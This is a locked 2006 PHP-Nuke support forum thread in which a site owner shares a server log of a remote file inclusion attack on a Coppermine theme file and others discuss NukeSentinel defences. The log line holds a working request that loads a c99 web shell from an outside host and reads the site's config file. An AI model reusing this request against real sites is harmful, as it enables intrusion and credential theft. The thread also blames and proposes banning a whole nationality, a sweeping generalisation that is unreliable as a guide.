Ravens PHP Scripts: Forums

View next topic
View previous topic
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm) v2.4.x
Jenses

PostPosted: Thu Feb 16, 2006 1:59 pm Reply with quote

Got hacked by this kind of method (from my sites log)
Code:
85.97.105.136 - - [16/Feb/2006:01:21:35 +0100] "GET /modules/coppermine/themes/maze/theme.php?THEME_DIR=http%3A%2F%2Fwww.funmekani.com%2Fq%2Fc99shell.txt%3F&act=f&f=config.php&d=%2Fxxxx%2Fxxxx%2Fxxxx%2Fxxxxx%2Fdomain.dk& HTTP/1.1" 200 6224 

(xxx are replacements from my actual path)

I do now that the theme.php was obsolete and apparently included some bug - this file is removed, but how can I know if there are other files like this one that will open a back door to my system.

My domain is danish so right now many turkish hackers find it to be there right to hack me (muhammed cartoons).
I can ban all turkish IP's - but then they just let theire relatives in Europe do it.

Isnt there a way to catch this kind of hack-attempts??

Raven
Site Admin/Owner

PostPosted: Thu Feb 16, 2006 2:01 pm Reply with quote

Get rid of Coppermine if you use nuke. We can't reiterate this enough. Just search the forums for information.

jaded
Theme Guru

PostPosted: Thu Feb 16, 2006 2:26 pm Reply with quote

Yes, More then likely, as Raven pointed out, it is coppermine. Be sure that if you do remove it, you remove ALL of it. This has been discussed many, many times. Thanks and Good Luck!

Ghost Stories & More [ Only registered users can see links on this board! Get registered or login! ] 
Raven

PostPosted: Thu Feb 16, 2006 4:50 pm Reply with quote

Jenses, Are you at patch level 2,3, or 4 of NukeSentinel v2.4.2? The reason I ask is that I have code in there that would have stopped that.

evaders99
Former Moderator in Good Standing

PostPosted: Thu Feb 16, 2006 5:20 pm Reply with quote

There is code that would have detected this particular Coppermine vulnerability? Or just the cross-scripting part?
What blocker is this in?

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
Raven

PostPosted: Thu Feb 16, 2006 5:49 pm Reply with quote

xss in includes/nukesentinel.php, pl2 I believe handles the hex and there's other code to trap [ Only registered users can see links on this board! Get registered or login! ] in the url request.

evaders99

PostPosted: Thu Feb 16, 2006 10:24 pm Reply with quote

Alright, just curious if there is a way to detect such things directly. We could block all these robots trying various exploits for awstats, other Nuke forks, etc. I'm currently using DisError, so when it gets a 404, it passes through a page where I can filter on they were trying to do.

Jenses

PostPosted: Fri Feb 17, 2006 3:10 am Reply with quote

Hi Raven
Im on the newest 2.4.2pl4 - have added the pc-killer

I find it a little 'cheap' to say 'get rid of' - we should be able to detect vunerabilities so code can be changed to stop exploites - I wonder if anyone made a tool to test modules systematicly for all known exploites ??

Raven

PostPosted: Fri Feb 17, 2006 3:50 am Reply with quote

I actually have one started but I put it on the back burner. So, from me, at least, the answer is no.

Jenses

PostPosted: Fri Feb 17, 2006 7:22 am Reply with quote

Hope to see that one soon - in the meantime I add the normal "if (!defined('MODULE_FILE')) {..." to my 3 party modules
- - and ban all turkish IP's from my sites

jaded

PostPosted: Fri Feb 17, 2006 7:52 am Reply with quote

That will not be enough to secure coppermine. Most of us strongly suggest that you remove it entirely. Best of luck to you

This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm) v2.4.x

View next topic
View previous topic